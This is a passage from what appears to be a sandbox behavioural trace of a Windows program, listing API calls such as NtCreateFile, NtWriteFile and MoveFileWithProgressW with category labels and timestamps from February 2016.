"MoveFileWithProgressW"}, {"category": "device", "timestamp": "2016-02-16 17:42:01,581", "api": "DeviceIoControl"}, {"category": "device", "timestamp": "2016-02-16 17:42:01,591", "api": "DeviceIoControl"}, {"category": "device", "timestamp": "2016-02-16 17:42:01,591", "api": "DeviceIoControl"}, {"category": "device", "timestamp": "2016-02-16 17:42:01,591", "api": "DeviceIoControl"}, {"category": "device", "timestamp": "2016-02-16 17:42:01,591", "api": "DeviceIoControl"}, {"category": "device", "timestamp": "2016-02-16 17:42:01,591", "api": "DeviceIoControl"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,591", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,591", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,591", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,591", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,591", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:01,591", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,591", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,591", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,601", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,601", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,601", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,601", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,601", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:01,601", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,601", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,601", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,611", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,611", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,611", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,611", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,611", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:01,611", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,611", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,611", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,611", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,611", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,621", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,621", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,621", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,621", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,621", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,621", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:01,621", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,621", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,621", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,621", "api": "NtWriteFile"}, {"category": "device", "timestamp": "2016-02-16 17:42:01,631", "api": "DeviceIoControl"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,631", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,641", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,651", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,651", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,651", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,651", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,651", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:01,651", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,651", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,651", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,651", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,651", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,661", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,661", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,661", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,661", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,671", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,671", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:01,671", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,671", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,671", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,671", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,681", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,681", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,681", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,681", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,681", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:01,681", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,681", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,691", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,691", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,691", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,691", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,691", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,691", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:01,691", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,691", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,701", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,701", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,701", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,701", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,711", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,711", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:01,711", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,711", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,711", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,721", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,721", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,721", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,721", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,721", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:01,731", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,731", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,731", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,741", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,741", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,741", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,741", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,741", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:01,741", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,741", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,751", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,751", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,751", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,751", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,751", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,751", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:01,751", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,751", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,761", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,761", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,761", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,761", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,761", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,761", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:01,771", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,771", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,771", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,781", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,781", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,781", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,781", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,781", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:01,781", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,781", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,781", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,791", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,791", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,791", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,791", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,791", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:01,791", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,791", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,791", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,801", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,801", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,801", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,801", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,801", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:01,801", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,801", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,801", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,811", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,811", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,811", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,811", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,811", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:01,811", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,811", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,821", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,821", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,821", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,821", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,831", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,831", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:01,831", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,831", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,831", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,841", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,841", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,841", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,841", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,841", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:01,841", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,841", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,841", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,851", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,851", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,851", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,851", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,851", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:01,851", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,851", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,851", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,861", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,861", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,861", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,861", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,861", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:01,861", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,861", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,861", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,871", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,871", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,871", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,871", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,871", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:01,871", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,871", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,881", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,881", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,881", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,881", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,881", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,881", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:01,891", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,891", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,891", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,891", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,901", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,901", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,901", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,901", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:01,901", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,901", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,901", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,911", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,911", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,911", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,911", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,911", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:01,911", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,911", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,921", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,921", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,921", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,921", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,921", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,921", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:01,921", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,931", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,931", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,931", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,931", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,931", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,941", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,941", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:01,941", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,941", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,941", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,941", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,941", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,941", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,941", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,941", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:01,951", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,951", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,951", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,951", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,951", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,951", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,961", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,961", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:01,961", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,961", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,961", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,971", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,971", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,971", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,971", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,971", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:01,971", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,971", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,971", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,981", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,981", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,981", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,981", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,981", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:01,981", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,981", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,981", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,991", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,991", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,991", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,991", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,991", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:01,991", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,991", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,991", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:01,991", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,001", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,001", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,001", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,001", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,001", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:02,001", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,001", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,001", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,001", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,011", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,011", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,011", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,011", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,011", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,011", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,011", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:02,011", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,011", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,011", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,011", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,021", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,021", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,021", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,021", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,021", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,021", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,021", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:02,021", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,031", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,031", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,031", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,031", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,031", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,041", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,041", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,041", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,041", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,041", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:02,041", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,041", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,041", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,041", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,041", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:02,051", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 